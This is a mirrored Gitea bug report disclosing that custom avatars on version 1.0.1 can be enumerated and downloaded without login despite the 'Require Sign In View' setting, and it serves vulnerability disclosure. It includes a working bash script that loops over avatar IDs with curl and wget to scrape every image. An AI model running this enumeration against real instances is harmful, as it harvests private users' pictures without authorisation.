Uploaded custom avatars enumerable and downloadable w/o login despite "Require Sign In View" being set #265

New Issue

GiteaMirror · 2025-11-02T03:16:30-06:00

GiteaMirror commented

2025-11-02 03:16:30 -06:00

Originally created by @ghost on GitHub (Jan 22, 2017).

Gitea version (or commit ref): 1.0.1
Operating system: Debian 8.7
Database (use [x]):
- PostgreSQL
- MySQL
- SQLite
Can you reproduce the bug at https://try.gitea.io:
- [] Yes (provide example URL) BUT
- No
- Not relevant as the public instance doesn't have the setting in question set
Log gist: https://gist.github.com/2ion/01f673323560ebe841dc93696ce2fd96

Description

Uploaded custom avatars remain enumerable by their numerical index without having to log in despite the setting "require sign in view" being set. This leaks information about local users (reverse image search, "real" profile pictures, etc) which is probably not intended. I suggest to require a login in this situtation.

#!/bin/bash
BASEURL=$1
BOUND=10000
check_http_status()
{
    local code=$(curl -o/dev/null --silent --head --write-out '%{http_code}' "$1")
    if (( code == 200 )) ; then
        return 0
    else
        return 1
    fi
}
for ((i=1;i<$BOUND;i++)); do
    URL="$BASEURL/avatars/$i"
    if check_http_status "$URL" ; then
        (wget -qO "$i" "$URL" &)
        echo -n +
    else
        echo -n _
    fi
done
echo

Use as:

./thescript https://your.private.gitea.instance.sexy

--- Want to back this issue? **[Post a bounty on it!](https://www.bountysource.com/issues/41210128-uploaded-custom-avatars-enumerable-and-downloadable-w-o-login-despite-require-sign-in-view-being-set?utm_campaign=plugin&utm_content=tracker%2F47456670&utm_medium=issues&utm_source=github)** We accept bounties via [Bountysource](https://www.bountysource.com/?utm_campaign=plugin&utm_content=tracker%2F47456670&utm_medium=issues&utm_source=github).

Originally created by @ghost on GitHub (Jan 22, 2017). - Gitea version (or commit ref): 1.0.1 - Operating system: Debian 8.7 - Database (use `[x]`): - [ ] PostgreSQL - [ ] MySQL - [x] SQLite - Can you reproduce the bug at https://try.gitea.io: - [] Yes (provide example URL) BUT - [ ] No - [x] Not relevant as the public instance doesn't have the setting in question set - Log gist: https://gist.github.com/2ion/01f673323560ebe841dc93696ce2fd96 ## Description Uploaded custom avatars remain enumerable by their numerical index without having to log in despite the setting "require sign in view" being set. This leaks information about local users (reverse image search, "real" profile pictures, etc) which is probably not intended. I suggest to require a login in this situtation. ```bash #!/bin/bash BASEURL=$1 BOUND=10000 check_http_status() { local code=$(curl -o/dev/null --silent --head --write-out '%{http_code}' "$1") if (( code == 200 )) ; then return 0 else return 1 fi } for ((i=1;i<$BOUND;i++)); do URL="$BASEURL/avatars/$i" if check_http_status "$URL" ; then (wget -qO "$i" "$URL" &) echo -n + else echo -n _ fi done echo ``` Use as: ``` ./thescript https://your.private.gitea.instance.sexy ``` <bountysource-plugin> --- Want to back this issue? **[Post a bounty on it!](https://www.bountysource.com/issues/41210128-uploaded-custom-avatars-enumerable-and-downloadable-w-o-login-despite-require-sign-in-view-being-set?utm_campaign=plugin&utm_content=tracker%2F47456670&utm_medium=issues&utm_source=github)** We accept bounties via [Bountysource](https://www.bountysource.com/?utm_campaign=plugin&utm_content=tracker%2F47456670&utm_medium=issues&utm_source=github). </bountysource-plugin>

GiteaMirror added the type/bug topic/security labels 2025-11-02 03:16:30 -06:00

GiteaMirror closed this issue

2025-11-02 03:16:31 -06:00

GiteaMirror referenced this issue

2025-11-02 11:42:47 -06:00

[PR #265] [MERGED] Lint models/access.go #15270

Sign in to join this conversation.